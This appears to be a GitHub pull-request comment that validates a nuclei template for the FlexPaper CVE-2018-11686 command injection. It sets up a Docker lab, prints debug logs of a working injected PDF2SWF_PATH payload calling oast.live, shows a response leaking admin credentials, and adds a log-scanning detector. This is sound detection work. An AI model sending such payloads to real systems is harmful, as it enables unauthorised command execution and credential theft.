Template for https://github.com/projectdiscovery/nuclei-templates/issues/12369
To create a vulnerable instance, create a Dockerfile with the following content:
FROM php:5.6-apache-stretch
COPY --chown=www-data:www-data ./flexpaper/ /var/www/html/
Get flexpaper:
git clone https://github.com/dw250100785/FlexPaper_2.1.2.git flexpaper
Build and run:
docker build -t flexpaper .
docker run --rm -p 8888:80 flexpaper
Run nuclei:
nuclei -u http://127.0.0.1:8888/ -t ~/git/nuclei-templates/http/cves/2018/CVE-2018-11686.yaml
I’ve validated this template locally?
Debug:
nuclei -u http://127.0.0.1:8888/ -t ~/git/nuclei-templates/http/cves/2018/CVE-2018-11686.yaml -debug
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.5
projectdiscovery.io
[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.live
[INF] [CVE-2018-11686] Dumped HTTP request for http://127.0.0.1:8888/php/setup.php?step=4&PDF2SWF_PATH=ping%20-c1%20d18esui1sadpsj315g70dwaqi7s3fwnb9.oast.live%20%7c%7c%20nslookup%20d18esui1sadpsj315g70byxtk1xmztc7n.oast.live%20%7c%7c%20echo%201%20%3e%2fdev%2ftcp%2fd18esui1sadpsj315g70aop8yajryszkh.oast.live%2f80%20%7c%7c%20curl%20http%3a%2f%2fd18esui1sadpsj315g70qj597ihyxpmdf.oast.live%20-o%20%2fdev%2fnull%20%7c%7c%20wget%20http%3a%2f%2fd18esui1sadpsj315g70mk41yud4antpy.oast.live%20-O%20%2fdev%2fnull%3b
GET /php/setup.php?step=4&PDF2SWF_PATH=ping%20-c1%20d18esui1sadpsj315g70dwaqi7s3fwnb9.oast.live%20%7c%7c%20nslookup%20d18esui1sadpsj315g70byxtk1xmztc7n.oast.live%20%7c%7c%20echo%201%20%3e%2fdev%2ftcp%2fd18esui1sadpsj315g70aop8yajryszkh.oast.live%2f80%20%7c%7c%20curl%20http%3a%2f%2fd18esui1sadpsj315g70qj597ihyxpmdf.oast.live%20-o%20%2fdev%2fnull%20%7c%7c%20wget%20http%3a%2f%2fd18esui1sadpsj315g70mk41yud4antpy.oast.live%20-O%20%2fdev%2fnull%3b HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
[DBG] [CVE-2018-11686] Dumped HTTP response http://127.0.0.1:8888/php/setup.php?step=4&PDF2SWF_PATH=ping%20-c1%20d18esui1sadpsj315g70dwaqi7s3fwnb9.oast.live%20%7c%7c%20nslookup%20d18esui1sadpsj315g70byxtk1xmztc7n.oast.live%20%7c%7c%20echo%201%20%3e%2fdev%2ftcp%2fd18esui1sadpsj315g70aop8yajryszkh.oast.live%2f80%20%7c%7c%20curl%20http%3a%2f%2fd18esui1sadpsj315g70qj597ihyxpmdf.oast.live%20-o%20%2fdev%2fnull%20%7c%7c%20wget%20http%3a%2f%2fd18esui1sadpsj315g70mk41yud4antpy.oast.live%20-O%20%2fdev%2fnull%3b
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Tue, 17 Jun 2025 04:26:46 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.4.25 (Debian)
Set-Cookie: PHPSESSID=d17c925b4718d50b022b52ed5fb7a29e; path=/
Vary: Accept-Encoding
X-Powered-By: PHP/5.6.40
<!--
{
"allowcache":true,
"splitmode":"false",
"path.pdf":"G:\\wamp\\www\\FlexPaper\\pdf\\",
"path.swf":"G:\\wamp\\www\\FlexPaper\\docs\\",
"renderingorder.primary":null,
"renderingorder.secondary":null,
"cmd.conversion.singledoc":"pdf2swf \"{path.pdf}{pdffile}\" -o \"{path.swf}{pdffile}.swf\" -f -T 9 -t -s storeallcharacters -s linknameurl",
"cmd.conversion.splitpages":"pdf2swf \"{path.pdf}{pdffile}\" -o \"{path.swf}{pdffile}_%.swf\" -f -T 9 -t -s storeallcharacters -s linknameurl",
"cmd.conversion.renderpage":"swfrender \"{path.swf}{swffile}\" -p {page} -o \"{path.swf}{pdffile}_{page}.png\" -X 1024 -s keepaspectratio",
"cmd.conversion.rendersplitpage":"swfrender \"{path.swf}{swffile}\" -o \"{path.swf}{pdffile}_{page}.png\" -X 1024 -s keepaspectratio",
"cmd.conversion.jsonfile":"pdf2json \"{path.pdf}{pdffile}\" -enc UTF-8 -compress \"{path.swf}{pdffile}.js\"",
"cmd.conversion.splitjsonfile":"pdf2json \"{path.pdf}{pdffile}\" -enc UTF-8 -compress -split 10 \"{path.swf}{pdffile}_%.js\"",
"cmd.searching.extracttext":"swfstrings \"{swffile}\"",
"cmd.query.swfwidth":"swfdump {swffile} -X",
"cmd.query.swfheight":"swfdump \"{swffile}\" -Y",
"pdf2swf":false,
"admin.username":"admin",
"admin.password":"123456",
"licensekey":"gpl"
}
-->
<br />
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/html/php/lib/config.php:31) in <b>/var/www/html/php/setup.php</b> on line <b>140</b><br />
[d18esui1sadpsj315g70qj597ihyxpmdf] Received DNS interaction from 172.69.49.15 at 2025-06-17 04:26:46
------------
DNS Request
------------
;; opcode: QUERY, status: NOERROR, id: 62173
;; flags:; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version 0; flags: do; udp: 1452
;; QUESTION SECTION:
;d18esui1sadpsj315g70qj597ihyxpmdf.oast.live. IN AAAA
------------
DNS Response
------------
;; opcode: QUERY, status: NOERROR, id: 62173
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2
;; QUESTION SECTION:
;d18esui1sadpsj315g70qj597ihyxpmdf.oast.live. IN AAAA
;; ANSWER SECTION:
d18esui1sadpsj315g70qj597ihyxpmdf.oast.live. 3600 IN A 178.128.210.172
;; AUTHORITY SECTION:
d18esui1sadpsj315g70qj597ihyxpmdf.oast.live. 3600 IN NS ns1.oast.live.
d18esui1sadpsj315g70qj597ihyxpmdf.oast.live. 3600 IN NS ns2.oast.live.
;; ADDITIONAL SECTION:
ns1.oast.live. 3600 IN A 178.128.210.172
ns2.oast.live. 3600 IN A 178.128.210.172
[CVE-2018-11686:word-1] [http] [critical] http://127.0.0.1:8888/php/setup.php?step=4&PDF2SWF_PATH=ping%20-c1%20d18esui1sadpsj315g70dwaqi7s3fwnb9.oast.live%20%7c%7c%20nslookup%20d18esui1sadpsj315g70byxtk1xmztc7n.oast.live%20%7c%7c%20echo%201%20%3e%2fdev%2ftcp%2fd18esui1sadpsj315g70aop8yajryszkh.oast.live%2f80%20%7c%7c%20curl%20http%3a%2f%2fd18esui1sadpsj315g70qj597ihyxpmdf.oast.live%20-o%20%2fdev%2fnull%20%7c%7c%20wget%20http%3a%2f%2fd18esui1sadpsj315g70mk41yud4antpy.oast.live%20-O%20%2fdev%2fnull%3b
[INF] Scan completed in 18.145644091s. 1 matches found.
/claim https://github.com/projectdiscovery/nuclei-templates/issues/12369
pszyszkowski
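A defender-side check for the request shape shown in the debug log above, as an added example that is not part of the original pull request or the nuclei template: it scans web access-log lines for `/php/setup.php` requests whose `PDF2SWF_PATH` value carries shell metacharacters. The log lines, client addresses and the `callback.example.invalid` host are constructed for illustration, and the Combined Log Format layout is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Characters that let a value break out of a single command argument.
# Whitespace is deliberately not included: a legitimate pdf2swf path may contain spaces.
SHELL_META = re.compile(r"[;&|`$<>\n]")
# Request field of a Combined Log Format line: "METHOD target PROTOCOL"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (not taken from a real server).
SAMPLE_LOG = [
    # Plausible installer use: a plain binary path.
    '203.0.113.5 - - [17/Jun/2025:04:20:01 +0000] '
    '"GET /php/setup.php?step=4&PDF2SWF_PATH=%2fusr%2fbin%2fpdf2swf HTTP/1.1" 200 512',
    # Same shape as the request in the debug output, with a placeholder host.
    '198.51.100.7 - - [17/Jun/2025:04:26:46 +0000] '
    '"GET /php/setup.php?step=4&PDF2SWF_PATH=ping%20-c1%20callback.example.invalid'
    '%20%7c%7c%20nslookup%20callback.example.invalid%3b HTTP/1.1" 200 2048',
    # Same parameter name on a different script: out of scope for this check.
    '198.51.100.9 - - [17/Jun/2025:04:27:10 +0000] '
    '"GET /index.php?PDF2SWF_PATH=a%7cb HTTP/1.1" 404 196',
]


def suspicious_setup_requests(log_lines):
    """Return (client_ip, decoded PDF2SWF_PATH) for each setup.php request
    whose PDF2SWF_PATH value contains a shell metacharacter."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.lower().endswith("/php/setup.php"):
            continue
        # parse_qs percent-decodes values, so %7c%7c is inspected as "||".
        params = parse_qs(target.query, keep_blank_values=True)
        for value in params.get("PDF2SWF_PATH", []):
            if SHELL_META.search(value):
                hits.append((line.split(" ", 1)[0], value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_setup_requests(SAMPLE_LOG):
        print(f"{client}: PDF2SWF_PATH={value!r}")
```

Access logs record only the query string, so a value sent in a POST body would need request-body logging or a WAF rule to be seen.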